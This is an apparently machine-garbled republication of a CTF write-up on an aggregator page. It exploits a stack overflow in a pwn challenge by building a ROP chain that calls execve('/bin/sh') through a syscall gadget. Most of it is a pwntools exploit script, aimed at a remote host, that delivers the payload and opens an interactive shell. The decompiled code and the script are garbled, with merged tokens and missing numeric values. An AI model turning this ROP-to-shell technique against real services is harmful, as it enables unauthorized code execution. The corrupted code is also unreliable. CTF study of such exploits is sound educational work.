Stack overflow of ROP to Syscall

Source: Internet
Author: User

When the program opens NX, but the program has a syscall call. At this time the use of the stack overflow can be performed through ROP to execute Syscall 59th call Execve ('/bin/sh ', null,null), this is ALICTF together PWN experience.


Ida matching GDB Locator vulnerability is as follows:

signed __int64 __fastcall sub_40108e (__int64 A1) {signed __int64 result;//[email protected]__int64 v2;//[email protected]  intV3;//[sp+10h] [bp-40h]@1__int64 v4;//[sp+20h] [bp-30h]@1__int64 v5;//[sp+28h] [bp-28h]@1__int64 V6;//[sp+30h] [bp-20h]@1__int64 V7;//[sp+38h] [bp-18h]@1__int64 V8;//[sp+40h] [bp-10h]@1UnsignedintV9;//[sp+48h] [bp-8h]@7  intV10;//[sp+4ch] [bp-4h]@4V4=0LL; V5=0LL; V6=0LL; V7=0LL; V8=0LL; V3=0; sub_400330 ((__int64)&v3, A1, 80LL);//processing input, first letter py bypasses login detection, 80 bytes of last 8 bytes control ret  if((_byte) v3! = the|| BYTE1 (v3)! =121)

The ROP chain for constructing Syscall is found through Ropgadget as follows:

0x46f208 : Pop Rax;ret 0x401823 : Pop Rdi;ret 0x462873 : Pop Rcx;ret 0x422568 : mov dword ptr [RDI], ecx; RET 0x46f205 0x58   ret0x43ae29: Pop rdx;pop rsi;ret0x45f2a5:  syscall;ret

Using code:

 fromPWN Import *#io=process ('./vss') IO=remote ('114.55.103.213',2333)Praxret=0x46f208Prdiret=0x401823Prcxret=0x0000000000462873# pop RCX retmovrdircx=0x422568Addespret=0x46f205#add RSP0x58Retprdxrsiret=0x43ae29Syscallret=0x45f2a5 Pay='py'+'a'* - Pay+=P64 (Addespret) +'a'*8 #add RSP 0x58; ret          Pay+=P64 (Praxret) +p64 ( -) #pop rax;ret pay+=P64 (Prcxret) +'/bin/sh\x00'+P64 (MOVRDIRCX) #pop Rcx;ret; mov dword ptr [RDI], ecx; RET pay+=P64 (Prdxrsiret) +p64 (0) +p64 (0) #pop rdx;pop rsi;ret pay+=p64 (Syscallret) #syscall; Retio.recvuntil ('password:\n') io.sendline (pay) io.interactive ()

Stack overflow of ROP to Syscall

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.